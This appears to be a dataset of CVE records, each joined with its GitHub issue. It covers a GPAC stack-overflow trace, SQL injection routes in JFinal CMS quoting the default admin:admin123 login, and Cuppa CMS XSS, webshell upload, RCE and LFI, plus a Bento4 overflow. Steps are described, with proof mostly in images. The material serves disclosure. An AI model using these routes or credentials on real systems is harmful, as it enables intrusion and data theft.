in gf_odf_parse_descriptor odf/descriptors.c:109 #143 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #144 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #145 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #146 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #147 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #148 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #149 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #150 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #151 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #152 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #153 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #154 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #155 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #156 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #157 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #158 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #159 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #160 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #161 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #162 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #163 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #164 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #165 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #166 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #167 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #168 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #169 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #170 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #171 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #172 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #173 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #174 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #175 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #176 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #177 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #178 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #179 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #180 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #181 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #182 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #183 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #184 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #185 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #186 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #187 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #188 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #189 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #190 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #191 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #192 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #193 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #194 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #195 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #196 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #197 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #198 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #199 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #200 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #201 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #202 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #203 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #204 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #205 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #206 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #207 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #208 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #209 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #210 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #211 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #212 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #213 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #214 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #215 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #216 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #217 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #218 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #219 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #220 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #221 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #222 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #223 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #224 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #225 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #226 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #227 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #228 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #229 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #230 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #231 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #232 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #233 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #234 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #235 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #236 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #237 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #238 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #239 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #240 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #241 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #242 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #243 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #244 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #245 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #246 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #247 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #248 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #249 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #250 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c) ==15396==ABORTING ```
AddressSanitizer: stack-overflow when processing ISOM_IOD
https://api.github.com/repos/gpac/gpac/issues/2216/comments
0
2022-07-02T17:45:58Z
2022-07-12T17:13:10Z
https://github.com/gpac/gpac/issues/2216
1,292,105,535
2,216
CVE-2022-38272
2022-09-09T14:15:08.777
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/article/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jflyfox/jfinal_cms/issues/51
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
Administrator login is required. The default account password is admin:admin123 ## admin/article/list There is a SQLI vul in background mode.The route is as following ![image-20220809171242344](http://qny.so4ms.top/pic/typora/image-20220809171242344.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successful injection at route `admin/article/list` ![image-20220809171414154](http://qny.so4ms.top/pic/typora/image-20220809171414154.png) ## admin/article/list_approve There is a SQLI vul in background mode.The route is as following ![image-20220809171803284](http://qny.so4ms.top/pic/typora/image-20220809171803284.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/article/list_approve` ![image-20220809171856633](http://qny.so4ms.top/pic/typora/image-20220809171856633.png) ## admin/comment There is a SQLI vul in background mode.The route is as following ![image-20220809172139669](http://qny.so4ms.top/pic/typora/image-20220809172139669.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/comment/list` ![image-20220809172210795](http://qny.so4ms.top/pic/typora/image-20220809172210795.png) ## admin/contact/list There is a SQLI vul in background mode.The route is as following ![image-20220809172322680](http://qny.so4ms.top/pic/typora/image-20220809172322680.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/contact/list` ![image-20220809172310037](http://qny.so4ms.top/pic/typora/image-20220809172310037.png) ## admin/foldernotice/list There is a SQLI vul in background mode.The route is as following ![image-20220809172537960](http://qny.so4ms.top/pic/typora/image-20220809172537960.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/foldernotice/list` ![image-20220809172749368](http://qny.so4ms.top/pic/typora/image-20220809172749368.png) ## admin/folderrollpicture/list There is a SQLI vul in background mode.The route is as following ![image-20220809172848024](http://qny.so4ms.top/pic/typora/image-20220809172848024.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/folderrollpicture/list` ![image-20220809172859284](http://qny.so4ms.top/pic/typora/image-20220809172859284.png) ## admin/friendlylink/list There is a SQLI vul in background mode.The route is as following ![image-20220809172925523](http://qny.so4ms.top/pic/typora/image-20220809172925523.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/friendlylink/list` ![image-20220809172951451](http://qny.so4ms.top/pic/typora/image-20220809172951451.png) ## admin/imagealbum/list There is a SQLI vul in background mode.The route is as following ![image-20220809173144022](http://qny.so4ms.top/pic/typora/image-20220809173144022.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/imagealbum/list` ![image-20220809173200483](http://qny.so4ms.top/pic/typora/image-20220809173200483.png) ## admin/image/list There is a SQLI vul in background mode.The route is as following ![image-20220809173242795](http://qny.so4ms.top/pic/typora/image-20220809173242795.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/image/list` ![image-20220809173310304](http://qny.so4ms.top/pic/typora/image-20220809173310304.png) ## admin/site/list There is a SQLI vul in background mode.The route is as following ![image-20220809173621504](http://qny.so4ms.top/pic/typora/image-20220809173621504.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/site/list` ![image-20220809173635288](http://qny.so4ms.top/pic/typora/image-20220809173635288.png)
Some SQL injection vulnerabilities exists in JFinal CMS 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/51/comments
0
2022-08-09T09:43:40Z
2022-08-09T09:46:05Z
https://github.com/jflyfox/jfinal_cms/issues/51
1,332,993,619
51
CVE-2022-38282
2022-09-09T14:15:09.267
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/videoalbum/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jflyfox/jfinal_cms/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
Administrator login is required. The default account password is admin:admin123 ## admin/videoalbum/list There is a SQLI vul in background mode.The route is as following ![image-20220809173719466](http://qny.so4ms.top/pic/typora/image-20220809173719466.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/videoalbum/list` ![image-20220809173732745](http://qny.so4ms.top/pic/typora/image-20220809173732745.png) ## admin/video/list There is a SQLI vul in background mode.The route is as following ![image-20220809173822633](http://qny.so4ms.top/pic/typora/image-20220809173822633.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/video/list` ![image-20220809173835144](http://qny.so4ms.top/pic/typora/image-20220809173835144.png) ## system/department/list There is a SQLI vul in background mode.The route is as following ![image-20220809173912226](http://qny.so4ms.top/pic/typora/image-20220809173912226.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `system/department/list` ![image-20220809173923320](http://qny.so4ms.top/pic/typora/image-20220809173923320.png) ## system/menu/list There is a SQLI vul in background mode.The route is as following ![image-20220809174004298](http://qny.so4ms.top/pic/typora/image-20220809174004298.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `system/menu/list` ![image-20220809174015340](http://qny.so4ms.top/pic/typora/image-20220809174015340.png) ## system/role/list There is a SQLI vul in background mode.The route is as following ![image-20220809174057768](http://qny.so4ms.top/pic/typora/image-20220809174057768.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `system/role/list` ![image-20220809174108907](http://qny.so4ms.top/pic/typora/image-20220809174108907.png)
Some SQL injection vulnerabilities exists in JFinal CMS 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/52/comments
0
2022-08-09T10:01:49Z
2022-08-09T10:01:49Z
https://github.com/jflyfox/jfinal_cms/issues/52
1,333,015,169
52
CVE-2022-38295
2022-09-12T21:15:11.243
Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/CuppaCMS/CuppaCMS/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Cross-Site Scripting exists in Cuppa CMS in Users tap. Discoverer : **Team Am0namiss**(Members : [hoseongJ](https://github.com/hoseongJ), [studdcat](https://github.com/studdcat), [AnonyMousStu](https://github.com/AnonyMousStu), [GuJiseung](https://github.com/GuJiseung), [4dministrat0r](https://github.com/4dministrat0r)) link : http://localhost/cuppa/#/component/table_manager/view/cu_user_groups ![xss1](https://user-images.githubusercontent.com/37374366/183646672-49b28eff-8523-4627-9e53-ee589926497b.png) - Users -> User groups -> Add User group ![xss2](https://user-images.githubusercontent.com/37374366/183646906-41ec5acd-429b-4825-8af6-400a5401c2c4.png) - Write scripts in "Name" field and click "Save" button ![xss3](https://user-images.githubusercontent.com/37374366/183647042-aadb38e0-1e35-4197-ac9e-4e821f1928e0.png) - Check script execution
XSS Vulnerability exists in Cuppa CMS in Users
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/34/comments
0
2022-08-09T12:30:41Z
2022-09-13T11:02:46Z
https://github.com/CuppaCMS/CuppaCMS/issues/34
1,333,188,097
34
CVE-2022-38296
2022-09-12T21:15:11.297
Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/CuppaCMS/CuppaCMS/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
File upload vulnerability exists in Cuppa CMS in File Manager tap. Discoverer : **Team Am0namiss**(Members : [hoseongJ](https://github.com/hoseongJ), [studdcat](https://github.com/studdcat), [AnonyMousStu](https://github.com/AnonyMousStu), [GuJiseung](https://github.com/GuJiseung), [4dministrat0r](https://github.com/4dministrat0r)) link : http://localhost/cuppa/media/attack.php (WebShell URL) ![cuppa fileupload 1](https://user-images.githubusercontent.com/37374366/183644230-44f93df4-d8f9-4d5e-ba17-cf12d846f6b1.png) ![cuppa fileupload 2](https://user-images.githubusercontent.com/37374366/183644414-2725d017-dc20-49f8-b162-7ab848a4ad98.png) ![cuppa fileupload 3](https://user-images.githubusercontent.com/37374366/183644432-5d54afea-96c4-49ef-81d6-b077d12879ec.png) - Click "rename" check in BurpSuite. And rename in BurpSuite. ![cuppa fileupload 4](https://user-images.githubusercontent.com/37374366/183644716-55420d8b-4389-4aae-916f-74e1da4c25f7.png) - Click "show URL" button and copy URL. ![cuppa fileupload 5](https://user-images.githubusercontent.com/37374366/183644772-37433d58-3228-4a59-9a66-c803bf044b1e.png) - Run Web Shell in Cuppa CMS
File Upload Vulnerability exists in Cuppa CMS in File Manager
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/33/comments
0
2022-08-09T12:17:02Z
2022-09-13T11:02:31Z
https://github.com/CuppaCMS/CuppaCMS/issues/33
1,333,171,744
33
CVE-2022-37190
2022-09-13T23:15:08.620
CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/22" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/badru8612/Authenticated-RCE-CuppaCMS" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/CuppaCMS/CuppaCMS/issues/22
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An authenticated user can control both parameters (**action** and **function**) from **"/cuppa/api/index.php"**. ![RCE_Cuppa-1](https://user-images.githubusercontent.com/10436828/151036909-2f26bacf-c8c8-45af-9b45-173414d9ad06.png) ![RCE_Cuppa-2](https://user-images.githubusercontent.com/10436828/151037117-12e67d9d-1053-4e02-934e-dd059989e8f1.png) Reference: https://github.com/badru8612/Authenticated-RCE-CuppaCMS
Authenticated Remote Code Execution in CuppaCMS api
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/22/comments
0
2022-01-25T18:30:36Z
2022-01-25T23:06:32Z
https://github.com/CuppaCMS/CuppaCMS/issues/22
1,114,229,498
22
CVE-2022-37191
2022-09-13T23:15:08.667
The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/20" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/CuppaCMS/CuppaCMS/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
There is a serious Local File Inclusion vulnerability exists in **"cuppa/api/index.php"** via **POST** requests "**function**" parameter. **PoC:** ![lfimap_cuppa-4](https://user-images.githubusercontent.com/10436828/150742843-ff0f05ee-1b82-451b-b44c-ec683aa904c0.png) Reference: https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability
Authenticated Local File Inclusion vulnerability in cuppa api.
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/20/comments
0
2022-01-24T07:59:02Z
2022-01-25T23:08:06Z
https://github.com/CuppaCMS/CuppaCMS/issues/20
1,112,291,001
20
CVE-2022-40438
2022-09-14T21:15:10.627
Buffer overflow vulnerability in function AP4_MemoryByteStream::WritePartial in mp42aac in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/751" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/751
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
